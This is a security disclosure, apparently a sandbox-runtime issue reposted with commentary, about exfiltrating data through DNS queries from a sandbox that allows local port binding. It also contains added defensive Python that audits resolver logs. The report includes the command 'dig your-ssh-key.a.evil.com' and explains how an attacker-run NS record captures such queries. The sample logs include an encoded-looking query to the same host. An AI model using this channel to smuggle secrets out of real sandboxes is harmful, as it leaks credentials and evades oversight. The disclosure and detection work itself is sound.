Data Exfiltration via DNS Resolution

Original link: https://github.com/anthropic-experimental/sandbox-runtime/issues/88

This security analysis demonstrates a potential data exfiltration vulnerability in a sandbox environment. Although direct network access to `evil.com` is blocked, a DNS query for `your-ssh-key.a.evil.com` *is* resolved successfully. The problem stems from allowing local port binding. An attacker who controls `evil.com` can manipulate DNS records (specifically NS records) so that DNS queries for a subdomain (`a.evil.com`) are redirected to their own DNS server. This lets them intercept sensitive information, such as the resolution attempt for `your-ssh-key.a.evil.com`, effectively bypassing the sandbox restrictions. The dig output confirms that the query was answered, revealing an IP address. The report emphasizes that enabling local port binding does not inherently prevent outbound requests made *through DNS manipulation*, which leaves the sandbox vulnerable to this type of data exfiltration.

Hacker News: 4 points, submitted by m-hodges 3 hours ago
Original

settings.json

{
  "network": {
    "allowedDomains": [],
    "deniedDomains": [],
    "allowLocalBinding": true
  },
  "filesystem": {
    "denyRead": [],
    "allowWrite": [],
    "denyWrite": []
  }
}

command

srt --settings settings.json 'dig your-ssh-key.a.evil.com'
  • evil.com domain is not on the allowed domains list, so this DNS query is blocked
  • Allowing local port binding doesn't allow outbound network requests from inside the sandbox
  • Data exfiltration: evil.com owners can set an NS record for a.evil.com, which causes Google/Cloudflare/all others to send the A your-ssh-key.a.evil.com query to evil.com-owned DNS servers.
  • Any sandbox with local port binding enabled is liable for data exfiltration.

; <<>> DiG 9.10.6 <<>> your-ssh-key.a.evil.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 25585
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 512
;; QUESTION SECTION:
;your-ssh-key.a.evil.com.	IN	A

;; ANSWER SECTION:
your-ssh-key.a.evil.com. 3600	IN	A	66.96.146.129

;; Query time: 48 msec
;; SERVER: 192.168.0.1#53(192.168.0.1)
;; WHEN: Mon Jan 12 17:29:41 EST 2026
;; MSG SIZE  rcvd: 68
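The issue above shows the two things a defender needs to check at the point where DNS queries leave the sandbox: whether the query *name* itself is covered by the domain policy (not only the connection that follows it), and whether the name looks like smuggled data. The following Python is an added example written for this page; it is not code from the sandbox-runtime project and does not model that project's actual policy semantics. The function names, the suffix-matching rules, the heuristic thresholds and the log lines are all constructed for illustration.

```python
"""Defender-side checks for DNS-based exfiltration (added example, not the
sandbox-runtime project's own code; all names and sample data are constructed)."""
import math
from collections import Counter


def _labels(name: str) -> list[str]:
    """Split a DNS name into lower-case labels, ignoring a trailing dot."""
    return [l for l in name.lower().rstrip(".").split(".") if l]


def domain_matches(name: str, pattern: str) -> bool:
    """True if `name` equals `pattern` or is a subdomain of it.
    Label-wise comparison avoids the classic 'notpypi.org' suffix mistake."""
    n, p = _labels(name), _labels(pattern)
    return len(n) >= len(p) and n[-len(p):] == p


def dns_query_allowed(name: str, allowed: list[str], denied: list[str]) -> bool:
    """Apply the domain policy to the *query name* before it is resolved.
    Assumed semantics (an assumption of this example): deny wins, an empty
    allow list resolves nothing, and an entry covers all of its subdomains,
    so 'evil.com' absent from the allow list blocks 'your-ssh-key.a.evil.com'."""
    if any(domain_matches(name, d) for d in denied):
        return False
    return any(domain_matches(name, a) for a in allowed)


def shannon_entropy(s: str) -> float:
    """Bits per character of a label; encoded payloads score high."""
    if not s:
        return 0.0
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def looks_like_exfil(name: str, max_label: int = 24, max_labels: int = 5,
                     min_entropy: float = 3.5) -> bool:
    """Heuristic for data smuggled in a query name: very long labels,
    high-entropy labels, or unusually deep names. Thresholds are constructed
    starting points and should be tuned against your own DNS baseline."""
    labels = _labels(name)
    if len(labels) > max_labels:
        return True
    return any(
        len(l) > max_label or (len(l) >= 16 and shannon_entropy(l) >= min_entropy)
        for l in labels
    )


# Constructed resolver log lines: "<timestamp> <client> query <type> <qname>".
SAMPLE_LOG = """\
2026-01-12T17:29:41Z sandbox-1 query A your-ssh-key.a.evil.com
2026-01-12T17:29:42Z sandbox-1 query A pypi.org
2026-01-12T17:29:43Z sandbox-1 query A mfrggzdfmztwq2lknnwg23tpobyxe43uov3ho6dzpi.a.evil.com
2026-01-12T17:29:44Z sandbox-1 query AAAA files.pythonhosted.org
"""


def audit_log(log: str, allowed: list[str], denied: list[str]) -> list[tuple[str, list[str]]]:
    """Run both checks over resolver log lines; return (qname, reasons) findings."""
    findings = []
    for line in log.splitlines():
        _ts, _client, _kw, _qtype, qname = line.split()
        reasons = []
        if not dns_query_allowed(qname, allowed, denied):
            reasons.append("not-allowlisted")
        if looks_like_exfil(qname):
            reasons.append("exfil-shaped")
        if reasons:
            findings.append((qname, reasons))
    return findings


if __name__ == "__main__":
    for qname, reasons in audit_log(SAMPLE_LOG, ["pypi.org", "files.pythonhosted.org"], []):
        print(f"{qname}: {', '.join(reasons)}")
```

Note that the short name from the report (`your-ssh-key.a.evil.com`) is not caught by the shape heuristic at these thresholds; only the policy check stops it. That is the practical lesson of the issue: an allow list enforced on connections but not on query names leaves the resolver as an unguarded channel, so the policy check must run where the query is made, with the heuristic serving as a second, noisier signal for names that do pass policy.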
